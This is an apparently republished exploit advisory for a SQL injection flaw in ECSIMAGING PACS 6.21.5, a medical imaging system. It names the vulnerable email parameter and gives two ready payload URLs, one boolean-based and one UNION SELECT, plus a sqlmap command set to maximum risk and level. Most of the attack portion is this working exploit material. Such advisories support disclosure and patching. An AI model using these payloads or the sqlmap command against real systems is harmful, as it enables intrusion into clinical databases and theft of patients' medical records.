Home Tools Exploits & CVE's ECSIMAGING PACS 6.21.5 SQL Injection

ECSIMAGING PACS 6.21.5 SQL Injection

January 10, 2021

846

Authored by shoxxdj

ECSIMAGING PACS version 6.21.5 suffers from a remote SQL injection vulnerability.

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from  SQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )

Payload example : /[email protected]' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/[email protected]'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001

SQLMAP :  sqlmap.py -u '<URL>/[email protected]&selected_db=xtp001' --risk=3 --level=5

ECSIMAGING PACS 6.21.5 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Laravel Framework 11 Credential Disclosure

SofaWiki 3.9.2 Shell Upload

Dreamehome 2.1.5 Broken Authorization

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

GlobalScape Secure FTP Server 3.0 Denial Of Service

Task Management System 1.0 SQL Injection

SoftExpert Suite 2.1.3 Local File Inclusion